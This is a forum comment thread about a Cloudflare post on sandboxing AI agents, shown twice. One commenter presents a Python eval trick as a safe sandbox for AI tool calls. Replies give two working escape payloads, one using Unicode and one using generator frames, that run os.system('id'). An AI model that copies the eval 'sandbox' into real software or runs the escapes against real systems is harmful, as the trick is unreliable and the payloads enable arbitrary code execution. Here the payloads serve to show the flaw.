Sandboxing AI agents, 100x faster (opens in new tab)

(blog.cloudflare.com)

47 pointskentonv1d ago9 comments

9 comments

est1d ago

slightly related, if you need a safe python sandbox instead of eval(), you can try

eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})

I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09

I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.

This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.

farlow1d ago

You can bypass this with unicode:

eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

farlow1d ago

You can do it without unicode, too:

eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})

1 more reply

decodebytes1d ago

If anyone wants native python sandboxing without needing a cloud API, we just shipped an early python SDK from the https://nono.sh project:

import nono_py as nono

# Define capabilities caps = nono.CapabilitySet() caps.allow_path("/project", nono.AccessMode.READ_WRITE) caps.allow_file("/home/user/.gitconfig", nono.AccessMode.READ)

# Apply sandbox (irrevocable) nono.apply(caps)

# Your agent code runs here, fully sandboxed agent.run()

example using pydantic and fast API:

https://github.com/always-further/pydantic-ai-fastapi-nono

skybrian1d ago

Could an AI decide to download JavaScript libraries of its choice into a dynamic worker? That wouldn't be as flexible as a full Linux VM but it might be interesting.

Edit: I guess not:

> If your Dynamic Worker needs TypeScript compilation or npm dependencies, the code must be transpiled and bundled before passing to the Worker Loader.

https://developers.cloudflare.com/dynamic-workers/getting-st...

kentonvOP1d ago

When using Dynamic Workers, you generally don't run the AI harness inside the Dynamic Worker itself, but rather as a regular worker. But your harness would have a tool call that's like "executeCode" which runs code in the dynamic worker.

You could certainly set it up to allow the AI to import arbitrary npm modules if you want. We even offer a library to help with that:

https://www.npmjs.com/package/@cloudflare/worker-bundler

tosh1d ago

Let's say I have a bunch of objects (e.g. parquet) in R2, can the agent mount them? Or how do I best give the agent access to the objects? HTTP w/ signed urls? Injecting the credentials?

kentonvOP1d ago

Dynamic Workers don't have a built-in filesystem, but you can give them access to one.

What you would do is give the Worker a TypeScript RPC interface that lets it read the files -- which you implement in your own Worker. To give it fast access, you might consider using a Durable Object. Download the data into the Durable Object's local SQLite database, then create an RPC interface to that, and pass it off to the Dynamic Worker running on the same machine.

See also this experimental package from Sunil that's exploring what the Dynamic Worker equivalent of a shell and a filesystem might be:

https://www.npmjs.com/package/@cloudflare/shell

j / k navigate · click thread line to collapse

9 comments

est1d ago

slightly related, if you need a safe python sandbox instead of eval(), you can try

eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})

I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09

I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.

This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.

farlow1d ago

You can bypass this with unicode:

farlow1d ago

You can do it without unicode, too:

eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})

1 more reply

decodebytes1d ago

If anyone wants native python sandboxing without needing a cloud API, we just shipped an early python SDK from the https://nono.sh project:

import nono_py as nono

# Define capabilities caps = nono.CapabilitySet() caps.allow_path("/project", nono.AccessMode.READ_WRITE) caps.allow_file("/home/user/.gitconfig", nono.AccessMode.READ)

# Apply sandbox (irrevocable) nono.apply(caps)

# Your agent code runs here, fully sandboxed agent.run()

example using pydantic and fast API:

https://github.com/always-further/pydantic-ai-fastapi-nono

skybrian1d ago

Could an AI decide to download JavaScript libraries of its choice into a dynamic worker? That wouldn't be as flexible as a full Linux VM but it might be interesting.

Edit: I guess not:

> If your Dynamic Worker needs TypeScript compilation or npm dependencies, the code must be transpiled and bundled before passing to the Worker Loader.

https://developers.cloudflare.com/dynamic-workers/getting-st...

kentonvOP1d ago

You could certainly set it up to allow the AI to import arbitrary npm modules if you want. We even offer a library to help with that:

https://www.npmjs.com/package/@cloudflare/worker-bundler

tosh1d ago

Let's say I have a bunch of objects (e.g. parquet) in R2, can the agent mount them? Or how do I best give the agent access to the objects? HTTP w/ signed urls? Injecting the credentials?

kentonvOP1d ago

Dynamic Workers don't have a built-in filesystem, but you can give them access to one.

See also this experimental package from Sunil that's exploring what the Dynamic Worker equivalent of a shell and a filesystem might be:

https://www.npmjs.com/package/@cloudflare/shell

j / k navigate · click thread line to collapse